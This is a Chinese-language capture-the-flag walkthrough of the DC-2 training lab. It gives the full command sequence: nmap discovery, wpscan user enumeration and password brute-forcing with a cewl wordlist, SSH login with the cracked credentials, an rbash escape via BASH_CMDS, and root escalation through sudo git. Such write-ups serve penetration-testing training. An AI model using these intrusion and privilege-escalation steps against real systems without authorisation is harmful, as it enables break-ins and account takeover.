DC-2与DC-1非常像,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。DC-2一样有五个flag。
渗透靶场
目标是确定目标靶场
使用ifconfig来确认网段
知道网段后使用nmap -sP XXX.XXX.XXX.XXX/24
Nmap仅进行ping扫描 (主机发现),然后打印出对扫描做出响应的那些 主机,没有进一步的测试 (如端口扫描或者操作系统探测),这比列表扫描更积极,常 常用于和列表扫描相同的目的,它可以得到些许目标网络的信息而不被特别注意到,它可以很方便地得出网络上有多少机器正在运行或者监视服务器是否正常运行,常常有人称它为地毯式ping,它比 ping 广播地址更可靠,因为许多主机对广播请求不响应。
-sP 选项在默认情况下, 发送一个 ICMP 回声请求和一个 TCP 报文到 80 端口。如果非特权用户执行,就发送一个 SYN 报文 (用 connect()系统调用)到目标机的 80 端口,当特权用户扫描局域网上的目标机时,会发送 ARP 请求(-PR),除非使用了–send-ip 选项。
-sP 选项可以和除-P0)之外的任何发现探测类型-P* 选项结合使用更灵活,一旦使用了任何探测类型和端口选项,默认的探测(ACK 和回应请求)就被覆盖了,当防守严密的防火墙位于运行 Nmap 的源主机和目标网络之间时, 推荐使用那些高级选项。 否则,可能会被防火墙捕获并丢弃探测包或者响应包,一些主机就不能被探测到。
靶场IP为 XXX.XXX.XXX.XXX
探端口及服务
nmap -A -p- -v 192.168.184.133
-A 综合性扫v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息
发现开放了80端口,存在web服务 ,Apche/2.4.10
发现开放了7744端口,开放了ssh服务,OpenSSH 6.7p1
访问web站点
发现访问不了,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
修改hosts文件,添加靶机IP到域名dc-2的指向
vim /etc/hosts
添加完成后,再次访问,访问成功
很明显的发现这是一个woedpress的站点
在网页下发现一个flag,点击后发现flag1
大致意思 暴力破解账号密码
做一个目录扫描
dirb http://dc-2/
dirb是Web内容扫描程序。 它查找现有的(和/或隐藏的)Web对象。 它基本上是通过对Web服务器发起基于dictionaryd的攻击并分析响应来工作的
发现疑似后台地址的超链接
右键点击打开链接
打开后进入到一个登录页面
发现很多个遍历,但好像没有什么有用的东西
用户枚举
前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
Wpscan一些常用语句:
wpscan --url http://dc-2
wpscan --url http://dc-2 --enumerate t 扫描主题
wpscan --url http://dc-2 --enumerate p 扫描插件
wpscan --url http://dc-2 --enumerate u 枚举用户
扫描wordpress版本
wpscan --url http://dc-2
发现wordpress的版本4.7.10
登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举
首先来个用户枚举,再尝试利用枚举到的用户爆破密码
wpscan --url http://dc-2 --enumerate u
枚举出三个用户名
admin jerry tom
根据flag1可以用暴力破解,我们使用cewl生成字典,
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。
为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件:
cewl http://dc-2/ -w dict.txt 或者 cewl http://dc-2/ > 1.txt
使用wpscan进行暴力破解
wpscan --url http://dc-2 --passwords dc2.txt、
爆破出来两个账号
jerry/adipiscing
tom/parturient
jerry/adipiscing 登录此站点
tom/parturient 登录此站点
登录后台之后,我们看到flag2,我用的是jerry的账号
点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh
在tom的家目录发现flag3
jerry/adipiscing
tom/parturient
登录ssh
ssh [email protected] -p 7744
在tom账号的家目录 发现flag3
cat用不了
我这里把查看命令都尝试了一遍 less和vi可以来查看,
提示内容如下
接下来,尝试rbash绕过详情参考
查看可以使用的命令
echo $PATH
cd进不去目录 使用ls直接查看目录信息
使用echo来绕过rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /*
在jerry的家目录发现flag4
提示信息如下
大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权
使用tom用户无权限运行sudo 我们切换到jerry用户
我们可以看到无需root权限,jerry 可以使用 git
sudo -l
查看一下可以使用的root权限命令
find / -user root -perm -4000 -print 2>/dev/null
jerry用户也不可以直接sudo su
使用git命令进行提取
sudo git help status
输入!/bin/sh,直接输入就行
提权成功
cd /root
cat final-flag.txt
